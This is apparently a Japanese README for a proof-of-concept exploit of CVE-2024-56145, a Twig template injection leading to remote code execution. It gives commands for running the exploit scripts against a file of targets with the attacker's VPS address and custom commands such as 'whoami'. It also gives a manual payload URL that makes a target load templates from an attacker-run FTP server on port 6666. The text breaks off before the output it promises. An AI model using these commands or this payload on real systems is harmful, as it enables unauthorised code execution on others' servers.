
CVE-2024-56145 SSTI から RCE - twig テンプレート
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
カスタムコマンドも使用できます。例:python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i はあなたのIPまたはVPSのIPです(ipconfig / ifconfig で確認できます)。
例:python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
さて、脆弱なターゲットは見つかりましたが、さらに詳しく調べたいですか? そこで、poc2.pyを追加しました。これはターゲットに対する手動テスト用です。どのように使うのでしょうか?
まず fuser -k 6666/tcp を実行してください。
1. poc2.py を実行します(ポート6666がFTPとして起動します)。
2. ブラウザで yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/ を開きます。
3. 以下のように表示されます -

作成者 Chirag Artani (https://x.com/Chirag99Artani)